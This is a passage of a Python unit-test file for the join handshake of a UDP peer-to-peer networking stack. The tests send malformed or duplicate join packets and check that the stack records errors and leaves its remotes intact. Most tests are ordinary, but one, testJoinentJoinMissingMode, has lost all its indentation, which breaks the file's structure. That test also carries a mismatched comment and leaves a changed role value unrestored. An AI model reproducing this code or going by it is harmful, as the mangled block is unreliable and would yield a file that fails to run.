        self.serviceStacks([alpha], duration=0.1)
        self.assertEqual(len(alpha.transactions), 0) # transaction wasn't added
        self.assertIn('parsing_inner_error', alpha.stats) # Error occured
        self.assertEqual(alpha.stats['parsing_inner_error'], 1)
        self.assertEqual(len(beta.transactions), 1)
        self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
        remote = alpha.remotes.values()[0]
        self.assertTrue(remote.joined) # wasn't touched
        # redo the broken packet then drop it
        self.serviceStacks([alpha, beta], duration=10.0)
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
        self.assertTrue(alpha.remotes.values()[0].joined)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentJoinMissingName(self):
        '''
        Test joinent.join handles body data missing required name field (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentJoinMissingName.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        betaRemoteAlpha = beta.remotes.values()[0]
        # Test: no name
        alpha.clearStats()
        console.terse("\nTest joinent join missing name *********\n")
        # temporarily clear the local name so the join body carries name None
        orig_name = beta.local.name
        beta.local.name = None
        beta.join()
        beta.local.name = orig_name # restore right away; the packet is already queued
        self.serviceStacks([beta], duration=0.1)
        self.serviceStacks([alpha], duration=0.1)
        self.assertEqual(len(alpha.transactions), 0) # transaction wasn't added
        self.assertIn('invalid_join', alpha.stats) # Error occured
        self.assertEqual(alpha.stats['invalid_join'], 1)
        self.assertEqual(len(beta.transactions), 1)
        self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
        remote = alpha.remotes.values()[0]
        self.assertTrue(remote.joined) # wasn't touched
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentJoinMissingVerhex(self):
        '''
        Test joinent.join handles body data missing required verhex field (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentJoinMissingVerhex.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        betaRemoteAlpha = beta.remotes.values()[0]
        # Test: no verhex
        alpha.clearStats()
        console.terse("\nTest joinent join missing verhex *********\n")
        # temporarily clear the local verhex so the join body carries verhex None
        orig_verhex = beta.local.signer.verhex
        beta.local.signer.verhex = None
        beta.join()
        beta.local.signer.verhex = orig_verhex # restore right away; the packet is already queued
        self.serviceStacks([beta], duration=0.1)
        self.serviceStacks([alpha], duration=0.1)
        self.assertEqual(len(alpha.transactions), 0) # transaction wasn't added
        self.assertIn('invalid_join', alpha.stats) # Error occured
        self.assertEqual(alpha.stats['invalid_join'], 1)
        self.assertEqual(len(beta.transactions), 1)
        self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
        remote = alpha.remotes.values()[0]
        self.assertTrue(remote.joined) # wasn't touched
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentJoinMissingPubhex(self):
        '''
        Test joinent.join handles body data missing required pubhex field (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentJoinMissingPubhex.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        betaRemoteAlpha = beta.remotes.values()[0]
        # Test: no pubhex
        alpha.clearStats()
        console.terse("\nTest joinent join missing pubhex *********\n")
        # temporarily clear the local pubhex so the join body carries pubhex None
        orig_pubhex = beta.local.priver.pubhex
        beta.local.priver.pubhex = None
        beta.join()
        beta.local.priver.pubhex = orig_pubhex # restore right away; the packet is already queued
        self.serviceStacks([beta], duration=0.1)
        self.serviceStacks([alpha], duration=0.1)
        self.assertEqual(len(alpha.transactions), 0) # transaction wasn't added
        self.assertIn('invalid_join', alpha.stats) # Error occured
        self.assertEqual(alpha.stats['invalid_join'], 1)
        self.assertEqual(len(beta.transactions), 1)
        self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
        remote = alpha.remotes.values()[0]
        self.assertTrue(remote.joined) # wasn't touched
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentJoinMissingRole(self):
        '''
        Test joinent.join handles body data missing required role field (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentJoinMissingRole.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        betaRemoteAlpha = beta.remotes.values()[0]
        # Test: no role
        alpha.clearStats()
        console.terse("\nTest joinent join missing role *********\n")
        # temporarily clear the local role so the join body carries role None
        orig_role = beta.local.role
        beta.local.role = None
        beta.join()
        beta.local.role = orig_role # restore right away; the packet is already queued
        self.serviceStacks([beta], duration=0.1)
        self.serviceStacks([alpha], duration=0.1)
        self.assertEqual(len(alpha.transactions), 0) # transaction wasn't added
        self.assertIn('invalid_join', alpha.stats) # Error occured
        self.assertEqual(alpha.stats['invalid_join'], 1)
        self.assertEqual(len(beta.transactions), 1)
        self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
        remote = alpha.remotes.values()[0]
        self.assertTrue(remote.joined) # wasn't touched
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
def testJoinentJoinMissingMode(self):
'''
Test joinent.join handles body data missing required mode field (coverage)
'''
console.terse("{0}\n".format(self.testJoinentJoinMissingMode.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemoteAlpha = beta.remotes.values()[0]
# Test: no verhex
alpha.clearStats()
console.terse("\nTest joinent join missing mode *********\n")
orig_role = beta.local.role
beta.local.role = None
# stack join
remote = beta.retrieveRemote()
self.assertIsNotNone(remote)
joiner = transacting.Joiner(stack=beta,
remote=remote,
timeout=beta.JoinerTimeout,
txData=odict(hk=beta.Hk, bk=beta.Bk))
# joiner join
remote.joined = None
if beta.kind is None:
beta.kind = 0
# Hack: Set mode to None here
body = odict([('name', beta.local.name),
('mode', None),
('kind', beta.kind),
('verhex', str(beta.local.signer.verhex.decode('ISO-8859-1'))),
('pubhex', str(beta.local.priver.pubhex.decode('ISO-8859-1'))),
('role', beta.local.role)])
packet = packeting.TxPacket(stack=beta,
kind=raeting.PcktKind.request.value,
embody=body,
data=joiner.txData)
packet.pack()
console.concise("Joiner {0}. Do Join with {1} at {2}\n".format(
beta.name, beta.name, beta.store.stamp))
joiner.transmit(packet)
joiner.add(index=joiner.txPacket.index)
self.serviceStacks([beta], duration=0.1)
self.serviceStacks([alpha], duration=0.1)
self.assertEqual(len(alpha.transactions), 0) # transaction wasn't added
self.assertIn('invalid_join', alpha.stats) # Error occured
self.assertEqual(alpha.stats['invalid_join'], 1)
self.assertEqual(len(beta.transactions), 1)
self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
remote = alpha.remotes.values()[0]
self.assertTrue(remote.joined) # didn't touched
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
    def testJoinentJoinMissingKind(self):
        '''
        Test joinent.join handles body data missing required kind field (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentJoinMissingKind.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        alpha.clearStats()
        console.terse("\nTest joinent join missing kind *********\n")
        # stack join: build the join packet by hand so only kind is invalid
        remote = beta.retrieveRemote()
        self.assertIsNotNone(remote)
        joiner = transacting.Joiner(stack=beta,
                                    remote=remote,
                                    timeout=beta.JoinerTimeout,
                                    txData=odict(hk=beta.Hk, bk=beta.Bk))
        # joiner join
        remote.joined = None
        flags = [0, 0, 0, 0, 0, 0, 0, beta.main] # stack operation mode flags
        operation = packByte(fmt=b'11111111', fields=flags)
        # Hack: Set kind to None here
        body = odict([('name', beta.local.name),
                      ('mode', operation),
                      ('kind', None),
                      ('verhex', str(beta.local.signer.verhex.decode('ISO-8859-1'))),
                      ('pubhex', str(beta.local.priver.pubhex.decode('ISO-8859-1'))),
                      ('role', beta.local.role)])
        packet = packeting.TxPacket(stack=beta,
                                    kind=raeting.PcktKind.request.value,
                                    embody=body,
                                    data=joiner.txData)
        packet.pack()
        console.concise("Joiner {0}. Do Join with {1} at {2}\n".format(
            beta.name, beta.name, beta.store.stamp))
        joiner.transmit(packet)
        joiner.add(index=joiner.txPacket.index)
        self.serviceStacks([beta], duration=0.1)
        self.serviceStacks([alpha], duration=0.1)
        self.assertEqual(len(alpha.transactions), 0) # transaction wasn't added
        self.assertIn('invalid_join', alpha.stats) # Error occurred
        self.assertEqual(alpha.stats['invalid_join'], 1)
        self.assertEqual(len(beta.transactions), 1)
        self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
        remote = alpha.remotes.values()[0]
        self.assertTrue(remote.joined) # join state wasn't touched
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentJoinDuplicateJoinent(self):
        '''
        Test joinent.join handles duplications (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentJoinDuplicateJoinent.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        # Test: two join requests from beta hit the same joinent on alpha
        alpha.clearStats()
        console.terse("\nTest joinent join duplicate joinent *********\n")
        beta.join() # join beta to alpha
        self.assertEqual(len(beta.transactions), 1)
        beta.remotes.values()[0].transactions.values()[0].remove() # drop first transaction
        beta.join() # join beta to alpha again
        self.serviceStacks([beta], duration=0.1) # send 2 transactions
        self.serviceStacks([alpha], duration=0.1) # receive and handle 2 transactions
        self.assertEqual(len(alpha.transactions), 1) # only the first request is added to alpha
        self.assertEqual(len(beta.transactions), 1) # only the 2nd transaction is on beta
        self.assertIn('redundant_join_attempt', alpha.stats) # Error handled
        self.assertEqual(alpha.stats['redundant_join_attempt'], 1)
        self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
        remote = alpha.remotes.values()[0]
        self.assertIsNone(remote.joined)
        # redo the broken transactions then drop them
        self.serviceStacks([alpha, beta], duration=10.0)
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            self.assertIsNone(stack.remotes.values()[0].joined)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testVacuousJoinentJoinDuplicateNonVacuousJoiner(self):
        '''
        Test joinent.join handles duplications (coverage)
        Vacuous joinent found existing non-vacuous joiner
        Nack itself
        '''
        console.terse("{0}\n".format(self.testVacuousJoinentJoinDuplicateNonVacuousJoiner.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        # Test:
        alpha.clearStats()
        console.terse("\nTest vacuous joinent join duplicate non vacuous joiner *********\n")
        # Initiate 2 transactions
        # fuid == 0 makes the join vacuous; restore it afterwards
        orig_fuid = alpha.remotes.values()[0].fuid
        alpha.remotes.values()[0].fuid = 0
        alpha.join() # vacuous join alpha to beta
        alpha.remotes.values()[0].fuid = orig_fuid
        self.assertEqual(len(alpha.transactions), 1)
        # This step is incorrect from the logic viewpoint but good enough for coverage test.
        alpha.transactions[0].vacuous = False # imitate non-vacuous
        beta.remotes.values()[0].fuid = 0
        beta.join() # vacuous join beta to alpha
        self.assertEqual(len(alpha.transactions), 1)
        self.assertEqual(len(beta.transactions), 1)
        self.serviceStacks([beta], duration=0.1) # send beta join to alpha
        self.serviceStacks([alpha], duration=0.1) # receive and handle beta join to alpha
        # send alpha join to beta and the response
        self.assertEqual(len(alpha.transactions), 1) # only the first request is added to alpha
        self.assertEqual(len(beta.transactions), 1) # only the 2nd transaction is on beta
        self.assertIn('redundant_join_attempt', alpha.stats) # Error handled
        self.assertEqual(alpha.stats['redundant_join_attempt'], 1)
        self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
        remote = alpha.remotes.values()[0]
        self.assertIsNone(remote.joined)
        # redo the broken transactions then drop them
        self.serviceStacks([alpha, beta], duration=10.0)
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testNonVacuousJoinentJoinDuplicateVacuousJoiner(self):
        '''
        Test joinent.join handles duplications (coverage)
        Non-vacuous joinent found existing vacuous joiner
        Nack joiner, continue itself
        '''
        console.terse("{0}\n".format(self.testNonVacuousJoinentJoinDuplicateVacuousJoiner.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        # Test:
        alpha.clearStats()
        alpha.mutable = True
        console.terse("\nTest non vacuous joinent join duplicate vacuous joiner *********\n")
        # Initiate 2 transactions
        alpha.remotes.values()[0].fuid = 0 # fuid == 0 makes alpha's join vacuous
        alpha.join() # vacuous join alpha to beta
        self.assertEqual(len(alpha.transactions), 1)
        beta.join() # non-vacuous join beta to alpha
        self.assertEqual(len(alpha.transactions), 1)
        self.assertEqual(len(beta.transactions), 1)
        self.serviceStacks([beta], duration=0.1) # send beta join to alpha
        self.serviceStacks([alpha], duration=0.1) # receive and handle beta join to alpha
        # send alpha join to beta and the response
        self.assertEqual(len(alpha.transactions), 1) # joiner removed, joinent refused as changing immutable
        self.assertEqual(len(beta.transactions), 1) # only the 2nd transaction is on beta
        self.assertIn('joiner_transaction_failure', alpha.stats) # Error handled
        self.assertEqual(alpha.stats['joiner_transaction_failure'], 1)
        self.assertEqual(len(alpha.remotes), 1) # remote wasn't removed
        remote = alpha.remotes.values()[0]
        self.assertIsNone(remote.joined)
        # redo the broken transactions then drop them
        self.serviceStacks([alpha, beta], duration=10.0)
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            self.assertTrue(stack.remotes.values()[0].joined)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentJoinDuplicateJoinerMatchNames(self):
        '''
        Test joinent.join handles duplications (coverage)
        Non-vacuous joinent found existing non-vacuous joiner
        Joinent name < joiner name
            Nack joinent transaction
        Joinent name >= joiner name
            Nack joiner transaction
        '''
        console.terse("{0}\n".format(self.testJoinentJoinDuplicateJoinerMatchNames.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        # Test: local name 'alpha' < remote name 'beta' -> joinent nacked
        alpha.clearStats()
        console.terse("\nTest joinent join duplicate joiner local name less than remote *********\n")
        # Initiate 2 transactions
        alpha.join() # non-vacuous join alpha to beta
        beta.join() # non-vacuous join beta to alpha
        self.assertEqual(len(alpha.transactions), 1)
        self.assertEqual(len(beta.transactions), 1)
        # redo the broken transactions then drop them
        self.serviceStacks([alpha, beta], duration=10.0)
        self.assertIn('redundant_join_attempt', alpha.stats) # Error handled
        self.assertEqual(alpha.stats['redundant_join_attempt'], 1)
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            self.assertTrue(stack.remotes.values()[0].joined)
        # Test: local name 'gamma' > remote name 'beta' -> joiner nacked
        alpha.clearStats()
        console.terse("\nTest joinent join duplicate joiner remote name less than local *********\n")
        alpha.name = 'gamma' # 'gamma' > 'beta'
        beta.mutable = True
        # Initiate 2 transactions
        alpha.join() # non-vacuous join alpha to beta
        beta.join() # non-vacuous join beta to alpha
        self.assertEqual(len(alpha.transactions), 1)
        self.assertEqual(len(beta.transactions), 1)
        # redo the broken transactions then drop them
        self.serviceStacks([alpha, beta], duration=10.0)
        self.assertIn('joiner_transaction_failure', alpha.stats) # Error handled
        self.assertEqual(alpha.stats['joiner_transaction_failure'], 1)
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            self.assertTrue(stack.remotes.values()[0].joined)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testVacuousEphemeralJoinentJoinIncorrectRemoteId(self):
        '''
        Test vacuous ephemeral joinent.join with a remote id that doesn't match (coverage)
        '''
        console.terse("{0}\n".format(self.testVacuousEphemeralJoinentJoinIncorrectRemoteId.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        # Test conditions:
        # 1. Vacuous
        beta.remotes.values()[0].fuid = 0
        # 2. Ephemeral
        alpha.removeRemote(alpha.remotes.values()[0])
        # 3. remote.fuid != packet data eid
        #    Would be hacked in the test.
        # Test:
        alpha.clearStats()
        console.terse("\nTest remote id don't match *********\n")
        # Initiate transaction
        beta.join() # vacuous join beta to alpha
        self.serviceStacks([beta], duration=0.1)
        # Service alpha receive and call join manually instead of serviceStacks
        alpha.serviceReceives()
        # service rxes
        raw, sa = alpha.rxes.popleft()
        console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
        packet = packeting.RxPacket(stack=alpha, packed=raw)
        packet.parseOuter()
        sh, sp = sa
        packet.data.update(sh=sh, sp=sp)
        # process rx
        fuid = packet.data['se'] + 1 # hack fuid so it differs from the packet source eid
        remote = estating.RemoteEstate(stack=alpha,
                                       fuid=fuid,
                                       sid=packet.data['si'],
                                       ha=(packet.data['sh'], packet.data['sp']))
        alpha.correspond(packet, remote)
        alpha.process()
        self.assertIn('joinent_transaction_failure', alpha.stats) # Error handled
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testNonVacuousJoinentJoinNoDestinationIdMatch(self):
        '''
        Test non vacuous joinent.join with remote id absent in stack (coverage)
        '''
        console.terse("{0}\n".format(self.testNonVacuousJoinentJoinNoDestinationIdMatch.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        # Test:
        alpha.clearStats()
        console.terse("\nTest absent remote id *********\n")
        # Initiate transaction
        beta.join() # non-vacuous join beta to alpha
        self.serviceStacks([beta], duration=0.1)
        # Service alpha receive and call join manually instead of serviceStacks
        alpha.serviceReceives()
        # service rxes
        raw, sa = alpha.rxes.popleft()
        console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
        packet = packeting.RxPacket(stack=alpha, packed=raw)
        packet.parseOuter()
        sh, sp = sa
        packet.data.update(sh=sh, sp=sp)
        # process rx
        # hack: create a new remote that isn't the same object as the one in
        # stack.remotes[de/leid], so the destination id lookup fails
        remote = estating.RemoteEstate(stack=alpha,
                                       fuid=packet.data['se'],
                                       sid=packet.data['si'],
                                       ha=(packet.data['sh'], packet.data['sp']))
        alpha.correspond(packet, remote)
        alpha.process()
        self.assertIn('joinent_transaction_failure', alpha.stats) # Error handled
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentJoinErrorAddRemote(self):
        '''
        Test joinent.join got error on add remote (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentJoinErrorAddRemote.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        # Test:
        alpha.clearStats()
        console.terse("\nTest remote id don't match *********\n")
        # Initiate non vacuous transaction
        beta.join() # non-vacuous join beta to alpha
        self.serviceStacks([beta], duration=0.1)
        # Service alpha receive and call join manually instead of serviceStacks
        alpha.serviceReceives()
        # service rxes
        raw, sa = alpha.rxes.popleft()
        console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
        packet = packeting.RxPacket(stack=alpha, packed=raw)
        packet.parseOuter()
        sh, sp = sa
        packet.data.update(sh=sh, sp=sp)
        # process rx
        # Hack: change stack uid
        # Joinent will not find remote by uid in the stack and will try to re-add.
        # Add will fail by name unique check
        remote = alpha.remotes.values()[0]
        remote.uid += 1
        self.assertNotIn(remote.uid, alpha.remotes)
        alpha.correspond(packet, remote)
        alpha.process()
        self.assertIn('joinent_transaction_failure', alpha.stats) # Error handled
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentReceiveRefuse(self):
        '''
        Test joinent handles a refuse nack received from the joiner (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentReceiveRefuse.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        # Pend transaction: force alpha to pend instead of auto-accepting
        alpha.keep.auto = raeting.AutoMode.never.value
        alpha.keep.pendRemote(alpha.remotes.values()[0])
        alpha.clearStats()
        # Test:
        console.terse("\nTest joinent recieve refuse *********\n")
        # Initiate non vacuous transaction
        beta.join() # initiate transaction
        beta.transactions[0].nack(kind=raeting.PcktKind.refuse.value)
        self.serviceStacks([beta], duration=0.1) # send 2 packets
        # receive 2 packets on alpha
        # 1. Create transaction, pend join
        # 2. Handle refuse
        self.serviceStacks([alpha], duration=0.1)
        self.assertIn('joinent_rx_refuse', alpha.stats) # Error handled
        self.assertEqual(alpha.stats['joinent_rx_refuse'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentAckPendErrorPack(self):
        '''
        Test joinent.ackPend packet.pack error (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentAckPendErrorPack.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        # Pend beta on alpha so the join response is an ackPend
        alpha.keep.auto = raeting.AutoMode.never.value
        alpha.keep.pendRemote(alpha.remotes.values()[0])
        # Ensure remote status is Pending
        roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
        self.assertEqual(roleData['role'], beta.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
        # Test
        beta.join()
        self.serviceStacks([beta], duration=0.1) # send join
        # Shrink the max packet size so packet.pack() raises while alpha
        # builds its ackPend response; restore it right after.
        default_size = raeting.UDP_MAX_PACKET_SIZE
        raeting.UDP_MAX_PACKET_SIZE = 10 # packet.pack() will throw PacketError
        self.serviceStacks([alpha], duration=0.1) # handle and respond
        raeting.UDP_MAX_PACKET_SIZE = default_size
        # Checks
        self.assertIn('packing_error', alpha.stats)
        self.assertEqual(alpha.stats['packing_error'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentAckAcceptErrorPack(self):
        '''
        Test joinent.ackAccept packet.pack error (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentAckAcceptErrorPack.__doc__))
        alpha, beta = self.bootstrapJoinedRemotes()
        # Test
        beta.join()
        self.serviceStacks([beta], duration=0.1) # send join
        # Shrink the max packet size so packet.pack() raises while alpha
        # builds its ackAccept response; restore it right after.
        default_size = raeting.UDP_MAX_PACKET_SIZE
        raeting.UDP_MAX_PACKET_SIZE = 10 # packet.pack() will throw PacketError
        self.serviceStacks([alpha], duration=0.1) # handle and respond
        raeting.UDP_MAX_PACKET_SIZE = default_size
        # Checks
        self.assertIn('packing_error', alpha.stats)
        self.assertEqual(alpha.stats['packing_error'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentAckAcceptIncorrectKind(self):
        '''
        Test joinent.ackAccept incorrect kind (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentAckAcceptIncorrectKind.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        alpha.clearStats()
        console.terse("\nTest joinent ackAccept missing kind *********\n")
        # stack join with an invalid stack kind on alpha
        alpha.kind = -1
        self.join(beta, alpha, duration=10.0)
        self.assertIn('joinent_transaction_failure', alpha.stats) # Error occurred
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentPendErrorParseInner(self):
        '''
        Test joinent.pend handles parseInner error (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentPendErrorParseInner.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        beta.keep.auto = raeting.AutoMode.never.value
        # Test:
        beta.clearStats()
        console.terse("\nTest joinent pend parseInner error *********\n")
        beta.join() # Join
        self.serviceStacks([beta], duration=0.1) # beta send join
        self.serviceStacks([alpha], duration=0.1) # alpha read response, send ack
        # Pend from beta to alpha with broken data
        beta.serviceReceives()
        raw, sa = beta.rxes.popleft()
        console.verbose("{0} received packet\n{1}\n".format(beta.name, raw))
        packet = packeting.RxPacket(stack=beta, packed=raw)
        packet.parseOuter()
        sh, sp = sa
        packet.data.update(sh=sh, sp=sp)
        self.assertEqual(len(beta.transactions), 1)
        joiner = beta.transactions[0]
        joiner.rxPacket = packet
        # Break packet Inner: invalid coat kind makes alpha's parseInner fail
        joiner.txData['ck'] = -1
        joiner.ackPend() # Pend
        self.serviceStacks([beta], duration=0.1) # send pend
        self.serviceStacks([alpha], duration=0.1) # read pend, handle
        self.assertIn('parsing_inner_error', alpha.stats) # Error occurred
        self.assertEqual(alpha.stats['parsing_inner_error'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentCompleteErrorParseInner(self):
        '''
        Test joinent.complete handles parseInner error (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentCompleteErrorParseInner.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        # Test:
        beta.clearStats()
        console.terse("\nTest joinent complete parseInner error *********\n")
        beta.join() # Join
        self.serviceStacks([beta], duration=0.1) # beta send join
        self.serviceStacks([alpha], duration=0.1) # alpha read response, send ack
        # Complete from beta to alpha with broken data
        beta.serviceReceives()
        raw, sa = beta.rxes.popleft()
        console.verbose("{0} received packet\n{1}\n".format(beta.name, raw))
        packet = packeting.RxPacket(stack=beta, packed=raw)
        packet.parseOuter()
        sh, sp = sa
        packet.data.update(sh=sh, sp=sp)
        self.assertEqual(len(beta.transactions), 1)
        joiner = beta.transactions[0]
        joiner.rxPacket = packet
        # Break packet Inner: invalid coat kind makes alpha's parseInner fail
        joiner.txData['ck'] = -1
        joiner.ackAccept() # Complete
        self.serviceStacks([beta], duration=0.1) # send ack accept
        self.serviceStacks([alpha], duration=0.1) # read ack, handle
        self.assertIn('parsing_inner_error', alpha.stats) # Error occurred
        self.assertEqual(alpha.stats['parsing_inner_error'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentRejectErrorParseInner(self):
        '''
        Test joinent.reject handles parseInner error (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentRejectErrorParseInner.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        # Test:
        beta.clearStats()
        console.terse("\nTest joinent reject parseInner error *********\n")
        beta.join() # Join
        self.serviceStacks([beta], duration=0.1) # beta send join
        self.serviceStacks([alpha], duration=0.1) # alpha read response, send ack
        # Reject from beta to alpha with broken data
        beta.serviceReceives()
        raw, sa = beta.rxes.popleft()
        console.verbose("{0} received packet\n{1}\n".format(beta.name, raw))
        packet = packeting.RxPacket(stack=beta, packed=raw)
        packet.parseOuter()
        sh, sp = sa
        packet.data.update(sh=sh, sp=sp)
        self.assertEqual(len(beta.transactions), 1)
        joiner = beta.transactions[0]
        joiner.rxPacket = packet
        # Break packet Inner: invalid coat kind makes alpha's parseInner fail
        joiner.txData['ck'] = -1
        joiner.nack(kind=raeting.PcktKind.reject.value) # Reject
        self.serviceStacks([beta], duration=0.1) # send reject
        self.serviceStacks([alpha], duration=0.1) # read reject, handle
        self.assertIn('parsing_inner_error', alpha.stats) # Error occurred
        self.assertEqual(alpha.stats['parsing_inner_error'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentRefuseErrorParseInner(self):
        '''
        Test joinent.refuse handles parseInner error (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentRefuseErrorParseInner.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        # Test:
        beta.clearStats()
        console.terse("\nTest joinent refuse parseInner error *********\n")
        beta.join() # Join
        self.serviceStacks([beta], duration=0.1) # beta send join
        self.serviceStacks([alpha], duration=0.1) # alpha read response, send ack
        # Refuse from beta to alpha with broken data
        beta.serviceReceives()
        raw, sa = beta.rxes.popleft()
        console.verbose("{0} received packet\n{1}\n".format(beta.name, raw))
        packet = packeting.RxPacket(stack=beta, packed=raw)
        packet.parseOuter()
        sh, sp = sa
        packet.data.update(sh=sh, sp=sp)
        self.assertEqual(len(beta.transactions), 1)
        joiner = beta.transactions[0]
        joiner.rxPacket = packet
        # Break packet Inner: invalid coat kind makes alpha's parseInner fail
        joiner.txData['ck'] = -1
        joiner.nack(kind=raeting.PcktKind.refuse.value) # Refuse
        self.serviceStacks([beta], duration=0.1) # send refuse
        self.serviceStacks([alpha], duration=0.1) # read refuse, handle
        self.assertIn('parsing_inner_error', alpha.stats) # Error occurred
        self.assertEqual(alpha.stats['parsing_inner_error'], 1)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinentNackErrorPack(self):
        '''
        Test joinent.nack handles packet.pack error (coverage)
        '''
        console.terse("{0}\n".format(self.testJoinentNackErrorPack.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        # Test goal; Nack from joinent side
        # Test conditions: vacuous join to non-main joinent
